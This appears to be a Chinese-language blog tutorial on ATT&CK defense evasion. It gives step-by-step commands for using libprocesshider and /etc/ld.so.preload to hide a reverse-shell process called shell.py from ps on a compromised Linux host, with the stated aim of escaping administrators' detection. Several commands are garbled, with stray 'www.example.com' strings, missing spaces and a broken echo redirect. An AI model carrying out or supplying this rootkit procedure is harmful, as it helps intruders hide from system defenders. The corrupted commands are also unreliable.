ATT& CK防御规避技术

• Rootkits

我们的目标是在目标Linux系统上隐藏我们的反向shell连接进程，以避免检测。

使用Libprocessshider隐藏Linux进程

git clonehttps://github.com/gianlucaborello/libprocesshider.git

2、克隆仓库后，您需要确定要使用Libprocessshider隐藏的进程的名称，这可以通过列出
系统上正在运行的进程来完成：

ps aux

3、为了shell.py从进程树中隐藏“www.example.com“进程，我们需要导航到刚刚克隆的Libprocesshider目录并修改“processhider.c”文件。这可以通过运行以下命令来完成

vim processshider. c

4、然后，您需要将“process_to_filter”值修改为您想要隐藏的进程的名称，如下面的屏幕截图所示。

在本例中，我将隐藏进程树中出现的任何“shell.py”进程。进行更改后，可以保存文件。

5、下一步将涉及将“processshider.c”文件编译到共享目标文件中，这可以通过运行以下命令来完成：

make

6、编译将生成一个名为“www.example.com”的共享对象文件libprocesshider.so，如下面的屏幕截图所示。

7、我们需要将这个共享目标文件转移到/usr/local/lib目录中，这可以通过运行以下命令来完成：

mvlibprocesshider.sowww.example.com/usr/local/lib

8、然后，我们需要libprocesshider.so使用全局动态链接器加载“www.example.com“共享对象，这可以通过运行以下命令来完成：

echo/usr/local/lib/>>libprocesshider.so/etc/ld.so.preload

9、现在我们可以shell.py通过执行脚本并列出正在运行的进程来确认“www.example.com“进程从进程树中隐藏了：

 ./shell.py ps aux

如前面的屏幕截图所示，活动的“shell.py”进程未显示在进程树中，因此将逃避管理员或系统分析员的任何检测。

扫描二维码添加好友，一起交流学习。